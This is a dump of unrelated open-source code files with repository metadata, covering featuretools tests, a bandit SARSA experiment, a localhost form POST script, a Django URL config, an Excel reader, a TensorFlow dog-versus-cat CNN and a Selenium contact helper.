prop_answer[3] = 0 # no_unapproximated_aggs code ignores cutoff time
assert all(fm.index.values == cutoff_time["instance_id"].values)
for x, y in zip(fm.columns, [ifeat_answer, prop_answer, dfeat_answer]):
np.testing.assert_array_equal(fm[x], y)
def test_missing_instances_with_categorical_index(pd_es):
instance_ids = [0, 1, 3, 2]
features = ft.dfs(entityset=pd_es, target_entity='customers', features_only=True)
fm = calculate_feature_matrix(entityset=pd_es,
features=features,
instance_ids=instance_ids)
assert all(fm.index.values == instance_ids)
assert isinstance(fm.index, pd.CategoricalIndex)
def test_handle_chunk_size():
total_size = 100
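    # sizes in (0, 1) are treated as a fraction of total_size (rounded up to whole rows); sizes >= 1 as absolute counts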
# user provides no chunk size
assert _handle_chunk_size(None, total_size) is None
# user provides fractional size
assert _handle_chunk_size(.1, total_size) == total_size * .1
assert _handle_chunk_size(.001, total_size) == 1 # rounds up
assert _handle_chunk_size(.345, total_size) == 35 # rounds up
# user provides absolute size
assert _handle_chunk_size(1, total_size) == 1
assert _handle_chunk_size(100, total_size) == 100
assert isinstance(_handle_chunk_size(100.0, total_size), int)
# test invalid cases
with pytest.raises(AssertionError, match="Chunk size must be greater than 0"):
_handle_chunk_size(0, total_size)
with pytest.raises(AssertionError, match="Chunk size must be greater than 0"):
_handle_chunk_size(-1, total_size)
def test_chunk_dataframe_groups():
df = pd.DataFrame({
"group": [1, 1, 1, 1, 2, 2, 3]
})
grouped = df.groupby("group")
chunked_grouped = _chunk_dataframe_groups(grouped, 2)
# test group larger than chunk size gets split up
first = next(chunked_grouped)
assert first[0] == 1 and first[1].shape[0] == 2
second = next(chunked_grouped)
assert second[0] == 1 and second[1].shape[0] == 2
# test that equal to and less than chunk size stays together
third = next(chunked_grouped)
assert third[0] == 2 and third[1].shape[0] == 2
fourth = next(chunked_grouped)
assert fourth[0] == 3 and fourth[1].shape[0] == 1
def test_calls_progress_callback(mock_customer):
class MockProgressCallback:
def __init__(self):
self.progress_history = []
self.total_update = 0
self.total_progress_percent = 0
def __call__(self, update, progress_percent, time_elapsed):
self.total_update += update
self.total_progress_percent = progress_percent
self.progress_history.append(progress_percent)
mock_progress_callback = MockProgressCallback()
es = mock_customer
# make sure to calculate features that have different paths to same base feature
trans_per_session = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["sessions"], primitive=Count)
trans_per_customer = ft.Feature(es["transactions"]["transaction_id"], parent_entity=es["customers"], primitive=Count)
features = [trans_per_session, ft.Feature(trans_per_customer, entity=es["sessions"])]
calculate_feature_matrix(features, entityset=es, progress_callback=mock_progress_callback)
# second to last entry is the last update from feature calculation
assert np.isclose(mock_progress_callback.progress_history[-2], FEATURE_CALCULATION_PERCENTAGE * 100)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
# test with cutoff time dataframe
mock_progress_callback = MockProgressCallback()
cutoff_time = pd.DataFrame({"instance_id": [1, 2, 3],
"time": [pd.to_datetime("2014-01-01 01:00:00"),
pd.to_datetime("2014-01-01 02:00:00"),
pd.to_datetime("2014-01-01 03:00:00")]})
calculate_feature_matrix(features, entityset=es, cutoff_time=cutoff_time, progress_callback=mock_progress_callback)
assert np.isclose(mock_progress_callback.progress_history[-2], FEATURE_CALCULATION_PERCENTAGE * 100)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
def test_calls_progress_callback_cluster(pd_mock_customer):
class MockProgressCallback:
def __init__(self):
self.progress_history = []
self.total_update = 0
self.total_progress_percent = 0
def __call__(self, update, progress_percent, time_elapsed):
self.total_update += update
self.total_progress_percent = progress_percent
self.progress_history.append(progress_percent)
mock_progress_callback = MockProgressCallback()
trans_per_session = ft.Feature(pd_mock_customer["transactions"]["transaction_id"], parent_entity=pd_mock_customer["sessions"], primitive=Count)
trans_per_customer = ft.Feature(pd_mock_customer["transactions"]["transaction_id"], parent_entity=pd_mock_customer["customers"], primitive=Count)
features = [trans_per_session, ft.Feature(trans_per_customer, entity=pd_mock_customer["sessions"])]
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
calculate_feature_matrix(features,
entityset=pd_mock_customer,
progress_callback=mock_progress_callback,
dask_kwargs=dkwargs)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
def test_closes_tqdm(es):
class ErrorPrim(TransformPrimitive):
'''A primitive whose function raises an error'''
name = "error_prim"
input_types = [ft.variable_types.Numeric]
return_type = "Numeric"
compatibility = [Library.PANDAS, Library.DASK, Library.KOALAS]
def get_function(self):
def error(s):
raise RuntimeError("This primitive has errored")
return error
value = ft.Feature(es['log']['value'])
property_feature = value > 10
error_feature = ft.Feature(value, primitive=ErrorPrim)
calculate_feature_matrix([property_feature],
es,
verbose=True)
assert len(tqdm._instances) == 0
try:
calculate_feature_matrix([value, error_feature],
es,
verbose=True)
assert False
except RuntimeError as e:
assert e.args[0] == "This primitive has errored"
finally:
assert len(tqdm._instances) == 0
def test_approximate_with_single_cutoff_warns(pd_es):
features = dfs(entityset=pd_es,
target_entity='customers',
features_only=True,
ignore_entities=['cohorts'],
agg_primitives=['sum'])
match = "Using approximate with a single cutoff_time value or no cutoff_time " \
"provides no computational efficiency benefit"
# test warning with single cutoff time
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix(features,
pd_es,
cutoff_time=pd.to_datetime("2020-01-01"),
approximate="1 day")
# test warning with no cutoff time
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix(features,
pd_es,
approximate="1 day")
# check proper handling of approximate
feature_matrix = calculate_feature_matrix(features,
pd_es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:30"),
approximate="1 minute")
expected_values = [50, 50, 50]
assert (feature_matrix['régions.SUM(log.value)'] == expected_values).values.all()
def test_calc_feature_matrix_with_cutoff_df_and_instance_ids(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times, es['log'].index: instances})
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
property_feature = ft.Feature(es['log']['value']) > 10
match = "Passing 'instance_ids' is valid only if 'cutoff_time' is a single value or None - ignoring"
with pytest.warns(UserWarning, match=match):
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
instance_ids=[1, 3, 5],
verbose=True)
feature_matrix = to_pandas(feature_matrix)
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_calculate_feature_matrix_returns_default_values(default_value_es):
sum_features = ft.Feature(default_value_es["transactions"]["value"],
parent_entity=default_value_es["sessions"], primitive=Sum)
sessions_sum = ft.Feature(sum_features,
entity=default_value_es["transactions"])
feature_matrix = ft.calculate_feature_matrix(features=[sessions_sum],
entityset=default_value_es)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
expected_values = [2.0, 2.0, 1.0, 0.0]
assert (feature_matrix[sessions_sum.get_name()] == expected_values).values.all()
def test_entities_relationships(entities, relationships):
fm_1, features = ft.dfs(entities=entities,
relationships=relationships,
target_entity="transactions")
fm_2 = calculate_feature_matrix(features=features,
entities=entities,
relationships=relationships)
fm_1 = to_pandas(fm_1, index='id', sort_index=True)
fm_2 = to_pandas(fm_2, index='id', sort_index=True)
assert fm_1.equals(fm_2)
def test_no_entities(entities, relationships):
features = ft.dfs(entities=entities,
relationships=relationships,
target_entity="transactions",
features_only=True)
msg = "No entities or valid EntitySet provided"
with pytest.raises(TypeError, match=msg):
calculate_feature_matrix(features=features,
entities=None,
relationships=None)
def test_no_relationships(entities):
fm_1, features = ft.dfs(entities=entities,
relationships=None,
target_entity="transactions")
fm_2 = calculate_feature_matrix(features=features,
entities=entities,
relationships=None)
fm_1 = to_pandas(fm_1, index='id')
fm_2 = to_pandas(fm_2, index='id')
assert fm_1.equals(fm_2)
|
[
"you@example.com"
] |
you@example.com
|
c1932ced18cc4d0c93dce745c12cbbb5cfb102d5
|
c4a077e134f9f6a78b20b13ab329c582416e4ee9
|
/research/sweepSarsa.py
|
cc9314c4de238df0fb2fcde6fb78d94867bba7aa
|
[] |
no_license
|
mcmachado/ALEResearch
|
347e9b7ae58cf900dcf07f4a1a562c7b1d4a747d
|
e4924e8ad8beb156d4937f8b4213ea1dcf76b8fd
|
refs/heads/master
| 2021-01-10T07:30:48.244905
| 2016-11-28T00:16:40
| 2016-11-28T00:16:40
| 36,131,343
| 7
| 2
| null | 2015-10-01T23:33:06
| 2015-05-23T16:17:29
|
C++
|
UTF-8
|
Python
| false
| false
| 3,274
|
py
|
import sys
import random as r
import numpy as np
import statistics as stat
RMAX = 9.0
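# step sizes (alpha) swept in the experiment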
params = [0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5.0]
class Bandits:
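    '''Two-armed Gaussian bandit whose rewards are pre-sampled per seed for reproducibility.'''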
numArms = 2
mus = [1.0, 3.0]
sigmas = [0.5, 9.0]
    print('N(', mus[0], ',', sigmas[0], ') N(', mus[1], ',', sigmas[1], ') RMAX:', RMAX)
def __init__(self, s, numIterations):
np.random.seed(seed=s)
self.arms = []
self.currIdx = []
        for i in range(self.numArms):
self.currIdx.append(0)
self.arms.append([])
self.arms[i] = np.random.normal(self.mus[i], self.sigmas[i], numIterations + 1)
def pullArm(self, i):
assert(i < self.numArms)
self.currIdx[i] += 1
return self.arms[i][self.currIdx[i] - 1]
def resetEnv(self):
        for i in range(self.numArms):
self.currIdx[i] = 0
def epsilonGreedy(theta, epsilon=0.05):
    # with probability epsilon pick a random arm; otherwise exploit the greedy arm
    if r.random() < epsilon:
        return r.randint(0, len(theta) - 1)
    else:
        return np.argmax(theta)
''' Regular SARSA(0) implementation using a fixed step-size and
an epsilon-greedy policy.'''
def SARSA(b, numIterations, stepSize, optimism=0):
theta = []
acumReturn = 0
alpha = stepSize
    for i in range(b.numArms):
theta.append(optimism)
    for t in range(numIterations):
i = epsilonGreedy(theta)
reward = b.pullArm(i)
acumReturn += reward
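        # TD(0) update with a zero bootstrap term (single-state bandit): theta_i += alpha * (r + 0 - theta_i)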
theta[i] = theta[i] + alpha * (reward + 0 - theta[i])
return acumReturn
def main():
    for param in params:
        print()
        print('Step Size ' + str(param))
lvlOptimism = RMAX
numSeeds = 2000
numIterations = 1000
#Variables that will store the results for all methods
res_MAX = []
res_SARSA_P = []
res_SARSA_O = []
        '''Pre-sample every arm pull and store it, so the results are easy to
        reproduce and other methods can be compared on the same draws.'''
b = []
        for s in range(1, numSeeds + 1):
b.append(Bandits(s, numIterations))
#Run the experiment x times, where x is the number of seeds
        for s in range(1, numSeeds + 1):
seed = s
r.seed(seed)
res_MAX.append([])
res_SARSA_P.append([])
res_SARSA_O.append([])
maxReturn = 0
            '''First, compute the maximum return one could have obtained.'''
            for i in range(numIterations):
maxReturn += max(b[s-1].pullArm(0), b[s-1].pullArm(1))
res_MAX[s-1].append(maxReturn)
b[s-1].resetEnv()
            '''SARSA(0) agent, pessimistically initialized.'''
r.seed(seed)
res_SARSA_P[s-1].append(SARSA(b[s-1], numIterations, param))
b[s-1].resetEnv()
            '''SARSA(0) agent, optimistically initialized.'''
r.seed(seed)
res_SARSA_O[s-1].append(SARSA(b[s-1], numIterations, param, lvlOptimism))
b[s-1].resetEnv()
'''Now we can take the average return of each method:'''
res_MAX_avg = []
res_SARSA_P_avg = []
res_SARSA_O_avg = []
        for i in range(numSeeds):
res_MAX_avg.append(stat.mean(res_MAX[i]))
res_SARSA_P_avg.append(stat.mean(res_SARSA_P[i]))
res_SARSA_O_avg.append(stat.mean(res_SARSA_O[i]))
        print('Max return :', stat.mean(res_MAX_avg), ',', stat.stdev(res_MAX_avg))
        print('SARSA(0) -- pess.:', stat.mean(res_SARSA_P_avg), ',', stat.stdev(res_SARSA_P_avg))
        print('SARSA(0) -- opt. :', stat.mean(res_SARSA_O_avg), ',', stat.stdev(res_SARSA_O_avg))
if __name__ == '__main__':
    main()
|
[
"marlos.cholodovskis@gmail.com"
] |
marlos.cholodovskis@gmail.com
|
21de9e8f87a9c5280417736eaa4e0dc0c5f84a96
|
f0d70b5e2b4a74aaa5450c46d1edc65ef36c8c60
|
/week4/post_register.py
|
ce637905eb178a59370361b45174731ba2ae71f7
|
[] |
no_license
|
Natthapol-PEET/Internet-System-Programming
|
4cdcb472c4bec4913e5ddbcd71f32c8a2119f8bd
|
329e5723d2984b808a53a164110d9c0fd5fd2135
|
refs/heads/master
| 2022-12-17T09:02:28.392963
| 2020-09-20T15:24:20
| 2020-09-20T15:24:20
| 281,337,304
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 368
|
py
|
import urllib.request as ur
import urllib.parse as up
url = 'http://localhost/Register/register_post.php'
value = {
'name': 'PEET',
'location': '7-225',
'language': 'Python'
}
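# urlencode the form fields and encode to bytes; giving Request a data argument makes it a POST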
data = up.urlencode(value)
data = data.encode('ascii')
req = ur.Request(url, data)
with ur.urlopen(req) as res:
data_read = res.read()
print(data_read.decode('ascii'))
|
[
"natthapol.n@ku.th"
] |
natthapol.n@ku.th
|
2b509eb15e65f8db44f4cb66fe93f0a4ab30b00a
|
35ec162983b05964516e3037f4b57baa3552d989
|
/simplist/simplist/urls.py
|
56e2f387b093a8f12e2db7af84c22f6f8f8d7517
|
[] |
no_license
|
techscientist/Simplist
|
dd9e8ab4ef2588e66b5b57102367028bf8264501
|
f0657af76b976b4d6712813ee7fe9db719cdcd47
|
refs/heads/master
| 2020-12-31T01:47:33.706601
| 2016-02-19T01:44:06
| 2016-02-19T01:44:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
"""simplist URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
    url(r'^simplistApp/', include('simplistApp.urls')),
    url(r'^admin/', admin.site.urls),
]
|
[
"algarc04+github@gmail.com"
] |
algarc04+github@gmail.com
|
79f27119cb73feb73d0a17fd967a8c397a66599d
|
6e73ae0040136441c238e16f8b45c4920246a714
|
/xl.py
|
bb9252779584d36eae25a93ce9426f785dfdb38d
|
[] |
no_license
|
Qzwini/test-python-Excel-
|
1c0adf17ad48c80d3098858b70f70eee9b9281f1
|
6ec427019f645033f9fc2f46a2051bedcff02615
|
refs/heads/master
| 2022-12-17T02:49:18.425075
| 2020-09-15T22:44:37
| 2020-09-15T22:44:37
| 295,862,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
import pandas as pd
# read_excel loads the first sheet by default; an Excel engine such as openpyxl must be installed
excel_file = "xl.xlsx"
df = pd.read_excel(excel_file)
print(df)
|
[
"qzwini@gmail.com"
] |
qzwini@gmail.com
|
437ebcc8ee709f93b5842ce833b1b5047795bdc2
|
b8b11f4a8a2871300d2f909f6ef99ee5f9464900
|
/Part-1/05D.py
|
060abb0318520ddc97a045d2ab63bcc323f4c75d
|
[] |
no_license
|
shabanskaya/Data-Structures-Algorithms-in-Python
|
d9221fd2a2d57f9bfef2a38780aadcf2993656eb
|
4af75257bb96385e028a1909fce52645f3162b5c
|
refs/heads/main
| 2023-01-21T11:10:25.961154
| 2020-12-01T10:05:08
| 2020-12-01T10:05:08
| 317,496,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
# print the indices of strict local extrema (peaks and valleys) of the sequence
n = int(input())
a = list(map(int, input().split()))
for i in range(1, n - 1):
    if (a[i] > a[i-1] and a[i] > a[i+1]) or (a[i] < a[i-1] and a[i] < a[i+1]):
        print(i, end=' ')
|
[
"shabanskaia.ka@phystech.edu"
] |
shabanskaia.ka@phystech.edu
|
4068bc3b5400f96d9ce74cb10d77be3e036e6f0f
|
548f6a3d0478b5e1607a6b326f28ee3a59f5e91c
|
/Chapter03/Dog_cat_classification/CNN_DogvsCat_Classifier.py
|
6274a567e3adba914f7596b5a97eacbbe281fe22
|
[
"MIT"
] |
permissive
|
PacktPublishing/Practical-Convolutional-Neural-Networks
|
c6402550aa0c593f272eefab38c9e135f6c45d0d
|
3ebf6a68ff73c76580f2350a3a2b47b621f346c5
|
refs/heads/master
| 2023-02-09T20:56:40.334280
| 2023-01-30T08:26:25
| 2023-01-30T08:26:25
| 122,965,539
| 32
| 19
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,379
|
py
|
import time
import math
import random
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import Preprocessor
import cv2
import LayersConstructor
from sklearn.metrics import confusion_matrix
from datetime import timedelta
from tensorflow.python.framework import ops
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
import warnings
warnings.filterwarnings("ignore")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
ops.reset_default_graph()
# Convolutional Layer 1.
filter_size1 = 3
num_filters1 = 32
# Convolutional Layer 2.
filter_size2 = 3
num_filters2 = 32
# Convolutional Layer 3.
filter_size3 = 3
num_filters3 = 64
# Fully-connected layer.
fc_size = 128 # Number of neurons in fully-connected layer.
# Learning rate: a small value keeps training stable at the cost of longer training.
learning_rate = 1e-4
# Number of color channels for the images: 1 channel for gray-scale.
num_channels = 3
# image dimensions (only squares for now)
img_size = 128
# Size of image when flattened to a single dimension
img_size_flat = img_size * img_size * num_channels
# Tuple with height and width of images used to reshape arrays.
img_shape = (img_size, img_size)
# class info
classes = ['dogs', 'cats']
num_classes = len(classes)
# batch size
batch_size = 32
# validation split
validation_size = 0.16
# how many epochs to wait after validation loss stops improving before terminating training
early_stopping = None  # use None to disable early stopping
train_path = 'train/'
test_path = 'test/'
checkpoint_dir = "models/"
data = Preprocessor.read_train_sets(train_path, img_size, classes, validation_size=validation_size)
test_images, test_ids = Preprocessor.read_test_set(test_path, img_size)
print("Size of:")
print(" - Training-set:\t\t{}".format(len(data.train.labels)))
print(" - Test-set:\t\t{}".format(len(test_images)))
print(" - Validation-set:\t{}".format(len(data.valid.labels)))
def plot_images(images, cls_true, cls_pred=None):
if len(images) == 0:
print("no images to show")
return
else:
random_indices = random.sample(range(len(images)), min(len(images), 9))
images, cls_true = zip(*[(images[i], cls_true[i]) for i in random_indices])
# Create figure with 3x3 sub-plots.
fig, axes = plt.subplots(3, 3)
fig.subplots_adjust(hspace=0.3, wspace=0.3)
for i, ax in enumerate(axes.flat):
# Plot image.
ax.imshow(images[i].reshape(img_size, img_size, num_channels))
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true[i])
else:
xlabel = "True: {0}, Pred: {1}".format(cls_true[i], cls_pred[i])
# Show the classes as the label on the x-axis.
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
# Get some random images and their labels from the train set.
images, cls_true = data.train.images, data.train.cls
# Plot the images and labels using our helper-function above.
plot_images(images=images, cls_true=cls_true)
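# Placeholders: x holds flattened images, reshaped to (batch, height, width, channels) for the conv stack.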
x = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')
x_image = tf.reshape(x, [-1, img_size, img_size, num_channels])
y_true = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_true')
y_true_cls = tf.argmax(y_true, axis=1)
layer_conv1, weights_conv1 = \
LayersConstructor.new_conv_layer(input=x_image,
num_input_channels=num_channels,
filter_size=filter_size1,
num_filters=num_filters1,
use_pooling=True)
layer_conv2, weights_conv2 = \
LayersConstructor.new_conv_layer(input=layer_conv1,
num_input_channels=num_filters1,
filter_size=filter_size2,
num_filters=num_filters2,
use_pooling=True)
layer_conv3, weights_conv3 = \
LayersConstructor.new_conv_layer(input=layer_conv2,
num_input_channels=num_filters2,
filter_size=filter_size3,
num_filters=num_filters3,
use_pooling=True)
layer_flat, num_features = LayersConstructor.flatten_layer(layer_conv3)
layer_fc1 = LayersConstructor.new_fc_layer(input=layer_flat,
num_inputs=num_features,
num_outputs=fc_size,
use_relu=True)
layer_fc2 = LayersConstructor.new_fc_layer(input=layer_fc1,
num_inputs=fc_size,
num_outputs=num_classes,
use_relu=False)
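# Softmax turns the fc2 logits into per-class probabilities; argmax yields the predicted class.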
y_pred = tf.nn.softmax(layer_fc2)
y_pred_cls = tf.argmax(y_pred, axis=1)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer_fc2,
labels=y_true)
cost = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
init_op = tf.global_variables_initializer()
session = tf.Session()
session.run(init_op)
train_batch_size = batch_size
acc_list = []
val_acc_list = []
def print_progress(epoch, feed_dict_train, feed_dict_validate, val_loss):
# Calculate the accuracy on the training-set.
acc = session.run(accuracy, feed_dict=feed_dict_train)
val_acc = session.run(accuracy, feed_dict=feed_dict_validate)
return acc, val_acc
# Counter for total number of iterations performed so far.
total_iterations = 0
iter_list = []
def optimize(num_iterations):
# Ensure we update the global variable rather than a local copy.
global total_iterations
# Start-time used for printing time-usage below.
start_time = time.time()
best_val_loss = float("inf")
patience = 0
for i in range(total_iterations, total_iterations + num_iterations):
# Get a batch of training examples.
# x_batch now holds a batch of images and
# y_true_batch are the true labels for those images.
x_batch, y_true_batch, _, cls_batch = data.train.next_batch(train_batch_size)
x_valid_batch, y_valid_batch, _, valid_cls_batch = data.valid.next_batch(train_batch_size)
# Convert shape from [num examples, rows, columns, depth]
# to [num examples, flattened image shape]
x_batch = x_batch.reshape(train_batch_size, img_size_flat)
x_valid_batch = x_valid_batch.reshape(train_batch_size, img_size_flat)
# Put the batch into a dict with the proper names
# for placeholder variables in the TensorFlow graph.
feed_dict_train = {x: x_batch, y_true: y_true_batch}
feed_dict_validate = {x: x_valid_batch, y_true: y_valid_batch}
# Run the optimizer using this batch of training data.
# TensorFlow assigns the variables in feed_dict_train
# to the placeholder variables and then runs the optimizer.
session.run(optimizer, feed_dict=feed_dict_train)
# Print status at end of each epoch (defined as full pass through training Preprocessor).
if i % int(data.train.num_examples/batch_size) == 0:
val_loss = session.run(cost, feed_dict=feed_dict_validate)
epoch = int(i / int(data.train.num_examples/batch_size))
acc, val_acc = print_progress(epoch, feed_dict_train, feed_dict_validate, val_loss)
msg = "Epoch {0} --- Training Accuracy: {1:>6.1%}, Validation Accuracy: {2:>6.1%}, Validation Loss: {3:.3f}"
print(msg.format(epoch + 1, acc, val_acc, val_loss))
print(acc)
acc_list.append(acc)
val_acc_list.append(val_acc)
iter_list.append(epoch+1)
if early_stopping:
if val_loss < best_val_loss:
best_val_loss = val_loss
patience = 0
else:
patience += 1
if patience == early_stopping:
break
# Update the total number of iterations performed.
total_iterations += num_iterations
# Ending time.
end_time = time.time()
# Difference between start and end-times.
time_dif = end_time - start_time
# Print the time-usage.
print("Time elapsed: " + str(timedelta(seconds=int(round(time_dif)))))
def plot_example_errors(cls_pred, correct):
# cls_pred is an array of the predicted class-number for
# all images in the test-set.
# correct is a boolean array whether the predicted class
# is equal to the true class for each image in the test-set.
# Negate the boolean array.
incorrect = (correct == False)
# Get the images from the test-set that have been
# incorrectly classified.
images = data.valid.images[incorrect]
# Get the predicted classes for those images.
cls_pred = cls_pred[incorrect]
# Get the true classes for those images.
cls_true = data.valid.cls[incorrect]
# Plot the first 9 images.
plot_images(images=images[0:9], cls_true=cls_true[0:9], cls_pred=cls_pred[0:9])
def plot_confusion_matrix(cls_pred):
# cls_pred is an array of the predicted class-number for
# all images in the test-set.
# Get the true classifications for the test-set.
cls_true = data.valid.cls
# Get the confusion matrix using sklearn.
cm = confusion_matrix(y_true=cls_true, y_pred=cls_pred)
# Compute the precision, recall and f1 score of the classification
p, r, f, s = precision_recall_fscore_support(cls_true, cls_pred, average='weighted')
print('Precision:', p)
print('Recall:', r)
print('F1-score:', f)
# Print the confusion matrix as text.
print(cm)
# Plot the confusion matrix as an image.
plt.matshow(cm)
# Make various adjustments to the plot.
plt.colorbar()
tick_marks = np.arange(num_classes)
plt.xticks(tick_marks, range(num_classes))
plt.yticks(tick_marks, range(num_classes))
plt.xlabel('Predicted')
plt.ylabel('True')
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
def print_validation_accuracy(show_example_errors=False, show_confusion_matrix=False):
# Number of images in the test-set.
num_test = len(data.valid.images)
# Allocate an array for the predicted classes which
# will be calculated in batches and filled into this array.
    cls_pred = np.zeros(shape=num_test, dtype=int)
# Now calculate the predicted classes for the batches.
# We will just iterate through all the batches.
# There might be a more clever and Pythonic way of doing this.
# The starting index for the next batch is denoted i.
i = 0
while i < num_test:
# The ending index for the next batch is denoted j.
j = min(i + batch_size, num_test)
# Get the images from the test-set between index i and j.
        images = data.valid.images[i:j, :].reshape(j - i, img_size_flat)
# Get the associated labels.
labels = data.valid.labels[i:j, :]
# Create a feed-dict with these images and labels.
feed_dict = {x: images, y_true: labels}
# Calculate the predicted class using TensorFlow.
cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)
# Set the start-index for the next batch to the
# end-index of the current batch.
i = j
cls_true = np.array(data.valid.cls)
cls_pred = np.array([classes[x] for x in cls_pred])
# Create a boolean array whether each image is correctly classified.
correct = (cls_true == cls_pred)
# Calculate the number of correctly classified images.
# When summing a boolean array, False means 0 and True means 1.
correct_sum = correct.sum()
# Classification accuracy is the number of correctly classified
# images divided by the total number of images in the test-set.
acc = float(correct_sum) / num_test
# Print the accuracy.
msg = "Accuracy on Test-Set: {0:.1%} ({1} / {2})"
print(msg.format(acc, correct_sum, num_test))
# Plot some examples of mis-classifications, if desired.
if show_example_errors:
print("Example errors:")
plot_example_errors(cls_pred=cls_pred, correct=correct)
# Plot the confusion matrix, if desired.
if show_confusion_matrix:
print("Confusion Matrix:")
plot_confusion_matrix(cls_pred=cls_pred)
#Evaluation and optimization
optimize(num_iterations=10000)
print(acc_list)
# Plot loss over time
plt.plot(iter_list, acc_list, 'r--', label='CNN training accuracy per iteration', linewidth=4)
plt.title('CNN training accuracy per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training accuracy')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(iter_list, val_acc_list, 'r--', label='CNN validation accuracy per iteration', linewidth=4)
plt.title('CNN validation accuracy per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation accuracy')
plt.legend(loc='upper right')
plt.show()
print_validation_accuracy(show_example_errors=True, show_confusion_matrix=True)
plt.axis('off')
test_cat = cv2.imread('Test_image/cat.jpg')
test_cat = cv2.resize(test_cat, (img_size, img_size), interpolation=cv2.INTER_LINEAR) / 255
preview_cat = plt.imshow(test_cat.reshape(img_size, img_size, num_channels))
test_dog = cv2.imread('Test_image/dog.jpg')
test_dog = cv2.resize(test_dog, (img_size, img_size), interpolation=cv2.INTER_LINEAR) / 255
preview_dog = plt.imshow(test_dog.reshape(img_size, img_size, num_channels))
def sample_prediction(test_im):
feed_dict_test = {
x: test_im.reshape(1, img_size_flat),
y_true: np.array([[1, 0]])
}
test_pred = session.run(y_pred_cls, feed_dict=feed_dict_test)
return classes[test_pred[0]]
print("Predicted class for test_cat: {}".format(sample_prediction(test_cat)))
print("Predicted class for test_dog: {}".format(sample_prediction(test_dog)))
session.close()
|
[
"sagarsawant@packtpub.com"
] |
sagarsawant@packtpub.com
|
6fc944fca5a95025ed8dab29e533b8023e0b67d7
|
1c849dda331977bbfc1c2c1f511bc191a577c37a
|
/fixture/contact.py
|
749ab3b5914129a15cd811120e21181eea887fff
|
[
"Apache-2.0"
] |
permissive
|
Kassaidre/python-training
|
84255d46f5c347063bdfdf5ae16aacabdd86ba50
|
c8e54796d78dd7de84ba57cc8cfbeecd1298f466
|
refs/heads/master
| 2016-08-12T19:27:12.531516
| 2016-03-11T16:40:24
| 2016-03-11T16:40:24
| 50,449,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,719
|
py
|
from model.contact import Contact
import re
class ContactHelper:
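    """Page-object style helper that drives the addressbook UI through Selenium WebDriver."""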
def __init__(self, app):
self.app = app
def create(self, contact):
wd = self.app.wd
# init contact creation
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contact)
# submit contact creation
wd.find_element_by_name("submit").click()
self.return_to_home_page()
self.contact_cache = None
def fill_contact_form(self, contact):
wd = self.app.wd
self.change_field_value("firstname", contact.firstname)
self.change_field_value("middlename", contact.middlename)
self.change_field_value("lastname", contact.lastname)
self.change_field_value("nickname", contact.nickname)
self.change_field_value("title", contact.title)
self.change_field_value("company", contact.company)
self.change_field_value("address", contact.address)
self.change_field_value("home", contact.home)
self.change_field_value("mobile", contact.mobile)
self.change_field_value("work", contact.work)
self.change_field_value("fax", contact.fax)
self.change_field_value("email", contact.email)
self.change_field_value("email2", contact.email2)
self.change_field_value("email3", contact.email3)
